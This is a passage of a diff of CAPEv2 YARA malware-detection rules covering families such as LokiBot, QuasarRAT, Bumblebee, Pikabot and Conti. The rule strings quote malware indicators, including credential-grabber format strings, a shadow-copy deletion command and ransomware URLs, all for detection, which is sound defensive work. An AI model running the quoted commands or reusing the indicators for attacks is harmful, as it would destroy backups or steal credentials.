-		uint16( 0 ) == 0x5a4d and ( all of ( $dc* ) or all of ( $string* ) or 2 of ( $x* ) or 6 of ( $v* ) or 5 of ( $px* ) ) or ( $plugin and ( 4 of ( $av* ) or 5 of ( $pl* ) ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Dcrat_Kingrat
+rule CAPE_Lokibot : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "jeFF0Falltrades"
-		id = "9b63e361-6678-5c95-be32-777feecd194b"
-		date = "2025-02-03"
-		modified = "2025-02-03"
+		description = "LokiBot Payload"
+		author = "kevoreilly"
+		id = "8cdf69e2-ecac-5241-adba-c458cce0610f"
+		date = "2022-02-01"
+		modified = "2022-02-01"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AsyncRAT.yar#L224-L243"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "73ac27c3f0fc71d053e89690b5a7d29c1f8b0ea0a22e8595148a9001799fae54"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/LokiBot.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "a5b3d518371138740e913d2d6ce4fa22d3da5cea7e034c7d6b4b502e6bf44b06"
 		score = 75
-		quality = 62
-		tags = ""
-		cape_type = "DCRat Payload"
+		quality = 70
+		tags = "FILE"
+		cape_type = "LokiBot Payload"
 
 	strings:
-		$venom_1 = "VenomRAT" wide ascii nocase
-		$venom_2 = "HVNC_REPLY_MESSAGE" wide ascii
-		$str_aes_exc = "masterKey can not be null or empty" wide ascii
-		$str_b64_amsi = "YW1zaS5kbGw=" wide ascii
-		$str_b64_virtual_protect = "VmlydHVhbFByb3RlY3Q=" wide ascii
-		$str_dcrat = "dcrat" wide ascii nocase
-		$str_plugin = "save_Plugin" wide ascii
-		$str_qwqdan = "qwqdan" wide ascii
-		$byte_aes_key_base = { 7E [3] 04 73 [3] 06 80 }
-		$patt_config = { 72 [3] 70 80 [3] 04 }
-		$patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 }
+		$a1 = "DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW"
+		$a2 = "last_compatible_version"
 
 	condition:
-		( not any of ( $venom* ) ) and 5 of them and #patt_config >= 10
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Quasarrat : FILE
+rule CAPE_Socks5Systemz : FILE
 {
 	meta:
-		description = "QuasarRAT payload"
-		author = "ditekshen"
-		id = "f256b88f-eee6-5f8c-afd6-32ed10ea908d"
-		date = "2025-02-03"
-		modified = "2025-02-03"
+		description = "Socks5Systemz Payload"
+		author = "kevoreilly"
+		id = "ef14953a-2b48-54f4-8d15-c07c7459103e"
+		date = "2025-05-23"
+		modified = "2025-05-23"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AsyncRAT.yar#L245-L266"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "556b19dc0980761198ea31a285f281adae084463d24bff1eda15326436ad562b"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Socks5Systemz.yar#L1-L19"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "7e324bacd1ea57585435b6a5a4c93bda63ca146c100f2361a1c5530b87668299"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "QuasarRAT Payload"
+		cape_type = "Socks5Systemz Payload"
+		packed = "9b997d0de3fe83091726919a0dc653e22f8f8b20b1bb7d0b8485652e88396f29"
 
 	strings:
-		$s1 = "GetKeyloggerLogsResponse" fullword ascii
-		$s2 = "GetKeyloggerLogs" fullword ascii
-		$s3 = "/>Log created on" wide
-		$s4 = "User: {0}{3}Pass: {1}{3}Host: {2}" wide
-		$s5 = "Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7}" wide
-		$s6 = "grabber_" wide
-		$s7 = "<virtualKeyCode>" ascii
-		$s8 = "<RunHidden>k__BackingField" fullword ascii
-		$s9 = "<keyboardHookStruct>" ascii
-		$s10 = "add_OnHotKeysDown" ascii
-		$mutex = "QSR_MUTEX_" ascii wide
-		$ua1 = "Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0" fullword wide
-		$us2 = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A" fullword wide
+		$chunk1 = {0F B6 84 8A [4] E9 [3] (00|FF)}
+		$chunk2 = {0F B6 04 8D [4] E9 [3] (00|FF)}
+		$chunk3 = {66 0F 6F 05 [4] E9 [3] (00|FF)}
+		$chunk4 = {F0 0F B1 95 [4] E9 [3] (00|FF)}
+		$chunk5 = {83 FA 04 E9 [3] (00|FF)}
+		$chunk6 = {8A 04 8D [4] E9 [3] (00|FF)}
+		$chunk7 = {83 C4 04 83 C4 04 E9}
+		$chunk8 = {83 C2 04 87 14 24 5C E9}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $mutex or ( all of ( $ua* ) and 2 of them ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule CAPE_Quasarrat_Kingrat
+rule CAPE_Bumblebee : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "jeFF0Falltrades"
-		id = "dc0139e1-9f69-51da-b28f-212358b2f68b"
-		date = "2025-02-03"
-		modified = "2025-02-03"
+		description = "BumbleBee Payload"
+		author = "enzo & kevoreilly"
+		id = "b3a4dd53-014c-5e16-8ac1-7f3800ae017d"
+		date = "2024-10-29"
+		modified = "2024-10-29"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AsyncRAT.yar#L268-L287"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "1f4296a592134edbe52e256dc353143af02e897ff1afad98f3dac0c5ab13f3f7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/BumbleBee.yar#L35-L50"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "bc7c2ce9d3cd598c9510dc64d78048999f2f89ee5a84cd0d6046dbdfabe260ee"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "QuasarRAT Payload"
+		tags = "FILE"
+		cape_type = "BumbleBee Payload"
 
 	strings:
-		$str_quasar = "Quasar." wide ascii
-		$str_hidden = "set_Hidden" wide ascii
-		$str_shell = "DoShellExecuteResponse" wide ascii
-		$str_close = "echo DONT CLOSE THIS WINDOW!" wide ascii
-		$str_pause = "ping -n 10 localhost > nul" wide ascii
-		$str_aes_exc = "masterKey can not be null or empty" wide ascii
-		$byte_aes_key_base = { 7E [3] 04 73 [3] 06 25 }
-		$byte_aes_salt_base = { BF EB 1E 56 FB CD 97 3B B2 19 }
-		$byte_special_folder = { 7e 73 [4] 28 [4] 80 }
-		$patt_config = { 72 [3] 70 80 [3] 04 }
-		$patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 }
+		$antivm1 = {84 C0 74 09 33 C9 FF [4] 00 CC 33 C9 E8 [3] 00 4? 8B C8 E8}
+		$antivm2 = {84 C0 0F 85 [2] 00 00 33 C9 E8 [4] 48 8B C8 E8 [4] 48 8D 85}
+		$antivm3 = {33 C9 E8 [4] 48 8B C8 E8 [4] 83 CA FF 48 8B 0D [4] FF 15}
+		$antivm4 = {33 C9 E8 [4] 48 8B C8 E8 [4] 90 48 8B 05 [4] 48 85 C0 74}
+		$str_ua = "bumblebee"
+		$str_gate = "/gate"
 
 	condition:
-		6 of them and #patt_config >= 10
+		uint16( 0 ) == 0x5A4D and ( any of ( $antivm* ) or all of ( $str_* ) )
 }
-rule CAPE_Azer : FILE
+rule CAPE_Bumblebee2024
 {
 	meta:
-		description = "Azer Payload"
-		author = "kevoreilly"
-		id = "4bda70c2-3cd9-543f-92f4-886b7dd899a1"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		description = "BumbleBee 2024"
+		author = "enzok"
+		id = "ba92b894-912d-593c-acf9-99cb6ad6d61f"
+		date = "2024-10-29"
+		modified = "2024-10-29"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Azer.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "48bd4a4e071f10d1911c4173a0cd39c69fed7a3b29eb92beffe709899f4cefa5"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/BumbleBee.yar#L52-L68"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "db58272c1ba74bc6e6a90bdacf7e8feec94be5da2b5123e0475ce86448f3edb2"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Azer Payload"
+		tags = ""
+		cape_type = "BumbleBee Payload"
+		packed = "a20d56ab2e53b3a599af9904f163bb2e1b2bb7f2c98432519e1fbe87c3867e66"
 
 	strings:
-		$a1 = "webmafia@asia.com" wide
-		$a2 = "INTERESTING_INFORMACION_FOR_DECRYPT.TXT" wide
-		$a3 = "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ"
+		$rc4key = {48 [6] 48 [6] E8 [4] 4C 89 AD [4] 4C 89 AD [4] 4C 89 B5 [4] 4C 89 AD [4] 44 88 AD [4] 48 8D 15 [4] 44 38 2D [4] 75}
+		$botidlgt = {4C 8B C1 B? 4F 00 00 00 48 8D 0D [4] E8 [4] 4C 8B C3 48 8D 0D [4] B? 4F 00 00 00 E8 [4] 4C 8B C3 48 8D 0D [4] B? FF 0F 00 00 E8}
+		$botid = {90 48 [6] E8 [4] 4C 89 AD [4] 4C 89 AD [4] 4C 89 B5 [4] 4C 89 AD [4] 44 88 AD [4] 48 8D 15 [4] 44 38 2D [4] 75}
+		$port = {4C 89 6D ?? 4C 89 6D ?? 4c 89 75 ?? 4C 89 6D ?? 44 88 6D ?? 48 8D 05 [4] 44 38 2D [4] 75}
+		$dga1 = {4C 89 75 ?? 4C 89 6D ?? 44 88 6D ?? 48 8B 1D [4] 48 8D 0D [4] E8 [4] 8B F8}
+		$dga2 = {48 8D 0D [4] E8 [4] 8B F0 4C 89 6D ?? 4C 89 6D ?? 4C 89 75 ?? 4C 89 6D ?? 44 88 6D ?? 48 8D 15 [4] 44 38 2D [4] 75}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		$rc4key and all of ( $botid* ) and 2 of ( $port , $port , $dga1 , $dga2 )
 }
-rule CAPE_Varenyky : FILE
+rule CAPE_Codoso : FILE
 {
 	meta:
-		description = "Varenyky Payload"
+		description = "Codoso Payload"
 		author = "kevoreilly"
-		id = "e01695fa-72a0-5d8e-86ab-8c909d28b8ec"
+		id = "4c3d8d77-ffa9-576d-bf88-7b5a1bfd1811"
 		date = "2019-10-30"
 		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Varenyky.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "602f1b8b60b29565eabe2171fde4eb58546af68f8acecad402a7a51ea9a08ed9"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Codoso.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "32c9ed2ac29e8905266977a9ee573a252442d96fb9ec97d88642180deceec3f8"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Varenyky Payload"
+		cape_type = "Codoso Payload"
 
 	strings:
-		$onion = "jg4rli4xoagvvmw47fr2bnnfu7t2epj6owrgyoee7daoh4gxvbt3bhyd.onion"
+		$a1 = "WHO_A_R_E_YOU?"
+		$a2 = "DUDE_AM_I_SHARP-3.14159265358979"
+		$a3 = "USERMODECMD"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $onion )
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Emotetloader : FILE
+rule CAPE_Conti : FILE
 {
 	meta:
-		description = "Emotet Loader"
+		description = "Conti Ransomware"
 		author = "kevoreilly"
-		id = "aea8ff2e-bdf7-5417-a41c-93566d1dd019"
-		date = "2022-05-31"
-		modified = "2022-05-31"
+		id = "c94aed07-0eaf-5b51-a81e-e1992543673a"
+		date = "2021-03-15"
+		modified = "2021-03-15"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/EmotetLoader.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "410872d25ed3a89a2cba108f952d606cd1c3bf9ccc89ae6ab3377b83665c2773"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Conti.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "c9842f93d012d0189b9c6f10ad558b37ae66226bbb619ad677f6906ccaf0e848"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "EmotetLoader Payload"
+		cape_type = "Conti Payload"
 
 	strings:
-		$antihook = {8B 15 ?? ?? ?? ?? 03 15 ?? ?? ?? ?? 89 95 28 FF FF FF A1 ?? ?? ?? ?? 2D 4D 01 00 00 A3 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 3B 0D ?? ?? ?? ?? 76 26 8B 95 18 FF FF FF 8B 42 38}
+		$crypto1 = {8A 07 8D 7F 01 0F B6 C0 B9 ?? 00 00 00 2B C8 6B C1 ?? 99 F7 FE 8D [2] 99 F7 FE 88 ?? FF 83 EB 01 75 DD}
+		$website1 = "https://contirecovery.info" ascii wide
+		$website2 = "https://contirecovery.best" ascii wide
 
 	condition:
 		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Lumma_1 : FILE
+rule CAPE_Squirrelwaffle : FILE
 {
 	meta:
-		description = "Lumma Payload"
-		author = "kevoreilly"
-		id = "6ec1e0dc-028b-5135-9d0a-462718d90fe3"
-		date = "2024-10-22"
-		modified = "2024-10-22"
+		description = "No description has been set in the source file - CAPE"
+		author = "kevoreilly & R3MRUM"
+		id = "0ae75f24-7a2a-57d3-8c6f-a61ac6cc08e7"
+		date = "2021-10-13"
+		modified = "2021-10-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Lumma.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "44408ffa7870dbc1a8a31567dd743f46542da01ed8083e5413392920b9d1bafe"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/SquirrelWaffle.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "5f799333398421d537ec7a87ca94f6cc9cf1e53e55b353036a5132440990e500"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Lumma Payload"
-		packed = "0ee580f0127b821f4f1e7c032cf76475df9724a9fade2e153a69849f652045f8"
-		packed = "23ff1c20b16d9afaf1ce443784fc9a025434a010e2194de9dec041788c369887"
+		cape_type = "SquirrelWaffle Payload"
 
 	strings:
-		$decode1 = {C1 (E9|EA) 02 [0-3] 0F B6 (44|4C) ?? FF 83 (F8|F9) 3D 74 05 83 (F8|F9) 2E 75 01 (49|4A) [0-30] 2E 75}
-		$decode2 = {B0 40 C3 B0 3F C3 89 C8 04 D0 3C 09 77 06 80 C1 04 89 C8 C3 89 C8 04 BF 3C}
-		$decode3 = {B0 40 C3 B0 3F C3 80 F9 30 72 ?? 80 F9 39 77 06 80 C1 04 89 C8 C3}
+		$code = {8D 45 ?? C6 45 ?? 00 0F 43 4D ?? 83 7D ?? 10 0F 43 45 ?? 8A 04 10 32 04 39 8D 4D ?? 0F B6 C0 50 6A 01 E8 [4] C6 45}
+		$decode = {F7 75 ?? 83 7D ?? 10 8D 4D ?? 8D 45 ?? C6 45 ?? 00 0F 43 4D ?? 83 7D ?? 10 0F 43 45 ?? 8A 04 10 32 04 39}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Lokibot : FILE
+rule CAPE_Seduploader : FILE
 {
 	meta:
-		description = "LokiBot Payload"
+		description = "Seduploader decrypt function"
 		author = "kevoreilly"
-		id = "8cdf69e2-ecac-5241-adba-c458cce0610f"
-		date = "2022-02-01"
-		modified = "2022-02-01"
+		id = "a7152d8c-a197-5784-8a6d-453d41585df1"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/LokiBot.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "a5b3d518371138740e913d2d6ce4fa22d3da5cea7e034c7d6b4b502e6bf44b06"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Seduploader.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "d70c886699169d4dafc5b063c93682a34af5667df6d293b52256ddc19ab9c516"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "LokiBot Payload"
+		cape_type = "Seduploader Payload"
 
 	strings:
-		$a1 = "DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW"
-		$a2 = "last_compatible_version"
+		$decrypt1 = {8D 0C 30 C7 45 FC 0A 00 00 00 33 D2 F7 75 FC 8A 82 ?? ?? ?? ?? 32 04 0F 88 01 8B 45 0C 40 89 45 0C 3B C3 7C DB}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and any of ( $decrypt* )
 }
-rule CAPE_Megacortex : FILE
+rule CAPE_Pikabotloader : FILE
 {
 	meta:
-		description = "MegaCortex Payload"
+		description = "Pikabot Loader"
 		author = "kevoreilly"
-		id = "ea3dd937-2cb1-5b0f-98b8-154aacaf8650"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "e2c89cdd-0cdb-5367-8aae-2fe685eff972"
+		date = "2024-03-13"
+		modified = "2024-03-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/MegaCortex.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "5de1d8241260070241c91b97f18feb2a90069e3b158e863e2d9f568799c244e6"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/PikaBot.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "7e5f1f2911545ee6bd36b54f2627fbdec1b957f4b91df901dd1c6cbd4dff0231"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "MegaCortex Payload"
+		cape_type = "PikaBot Loader"
 
 	strings:
-		$str1 = ".megac0rtx" ascii wide
-		$str2 = "vssadmin delete shadows /all" ascii
-		$sha256 = {98 2F 8A 42 91 44 37 71 CF FB C0 B5 A5 DB B5 E9}
+		$indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1}
+		$sysenter1 = {89 44 24 08 8D 85 ?? FC FF FF C7 44 24 04 FF FF 1F 00 89 04 24 E8}
+		$sysenter2 = {C7 44 24 0C 00 00 00 02 C7 44 24 08 00 00 00 02 8B 45 0C 89 44 24 04 8B 45 08 89 04 24 E8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Codoso : FILE
+rule CAPE_Pikabot : FILE
 {
 	meta:
-		description = "Codoso Payload"
+		description = "Pikabot Payload"
 		author = "kevoreilly"
-		id = "4c3d8d77-ffa9-576d-bf88-7b5a1bfd1811"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "140a3e20-9837-5f66-85dc-af278d75e074"
+		date = "2024-03-13"
+		modified = "2024-03-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Codoso.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "32c9ed2ac29e8905266977a9ee573a252442d96fb9ec97d88642180deceec3f8"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/PikaBot.yar#L15-L28"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "ed07217c373831a9a67d914854154988696e6fcea70dedabf333385f0e7bb8b7"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Codoso Payload"
+		cape_type = "PikaBot Payload"
+		packed = "89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9"
 
 	strings:
-		$a1 = "WHO_A_R_E_YOU?"
-		$a2 = "DUDE_AM_I_SHARP-3.14159265358979"
-		$a3 = "USERMODECMD"
+		$decode = {29 D1 01 4B ?? 8D 0C 10 89 4B ?? 85 F6 74 02 89 16}
+		$indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1}
+		$config = {C7 44 24 [3] 00 00 C7 44 24 [4] 00 89 [1-4] ?? E8 [4] 31 C0 C7 44 24 [3] 00 00 89 44 24 ?? C7 04 24 [4] E8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Nemty : FILE
+rule CAPE_Pik23 : FILE
 {
 	meta:
-		description = "Nemty Ransomware Payload"
+		description = "PikaBot Payload February 2023"
 		author = "kevoreilly"
-		id = "3aa8e1d7-f9cb-5b04-923d-7bed15ab8c3f"
-		date = "2020-04-03"
-		modified = "2020-04-03"
+		id = "fc804c63-fc6c-5b26-92b1-aa5d2fbc4917"
+		date = "2024-03-13"
+		modified = "2024-03-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Nemty.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "a05974b561c67b4f1e0812639b74831edcf65686a06c0d380f0b45739e342419"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/PikaBot.yar#L30-L44"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "59f42ecde152f78731e54ea27e761bba748c9309a6ad1c2fd17f0e8b90f8aed1"
+		logic_hash = "71a71df2f2a075294941c54eed06cafaaa4d3294e45b3a0098c1cffddd0438bc"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Nemty Payload"
+		cape_type = "PikaBot Payload"
 
 	strings:
-		$tordir = "TorDir"
-		$decrypt = "DECRYPT.txt"
-		$nemty = "NEMTY"
+		$rdtsc = {89 55 FC 89 45 F8 0F 31 89 55 F4 89 45 FC 33 C0 B8 05 00 00 00 C1 E8 02 2B C3 3B C1 0F 31 89 55 F0 89 45 F8 8B 44 8D}
+		$int2d = {B8 00 00 00 00 CD 2D 90 C3 CC CC CC CC CC CC CC}
+		$subsys = {64 A1 30 00 00 00 8B 40 18 C3}
+		$rijndael = {EB 0F 0F B6 04 3? FE C? 8A 80 [4] 88 04 3? 0F B6 [3] 7C EA 5? 5? C9 C3}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 3 of them
 }
-rule CAPE_Masslogger : FILE
+rule CAPE_Dreambot : FILE
 {
 	meta:
-		description = "MassLogger"
+		description = "Dreambot Payload"
 		author = "kevoreilly"
-		id = "0743421a-36f7-5b7c-859f-b461511151cb"
-		date = "2020-11-24"
-		modified = "2020-11-24"
+		id = "675c2fea-fe48-5afd-9fa1-de919134892f"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/MassLogger.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "c8d82694810aafbdc6a35a661e7431e9536035e2f7fef90b9359064c4209b66c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Dreambot.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "29c6d648d5d38667c5824c2d20a83a20448c2ae6054ddddb2b2b7f8bdb69f74b"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "MassLogger Payload"
+		cape_type = "Dreambot Payload"
 
 	strings:
-		$name = "MassLogger"
-		$fody = "Costura"
+		$a1 = {53 56 33 F6 33 DB C1 6C 24 0C 02 74 2F 8B 02 85 C0 75 11 83 7C 24 0C 02 76 0A 39 42 04 75 05 39 42 08 74 18 43 8A CB D3 C0 33 C6 33 44 24 10 8B F0 89 32 83 C2 04 FF 4C 24 0C 75 D1 5E 5B C2 08 00}
+		$a2 = {53 33 C9 33 DB C1 6C 24 08 02 74 22 56 8B 02 85 C0 8B F0 74 18 33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 E0 5E 5B C2 08 00}
+		$b1 = "Oct  5 2016"
+		$b2 = ".bss"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5A4D and ( 1 of ( $a* ) ) and ( all of ( $b* ) )
 }
-rule CAPE_Dridexv4 : FILE
+rule CAPE_Wanacry : FILE
 {
 	meta:
-		description = "Dridex v4 Payload"
+		description = "WanaCry Payload"
 		author = "kevoreilly"
-		id = "c396f664-9f0d-50ac-bce8-33fd8712645a"
-		date = "2022-05-31"
-		modified = "2022-05-31"
+		id = "a6525e0f-fccd-5542-9be8-e42d708fe502"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/DridexV4.yar#L1-L15"
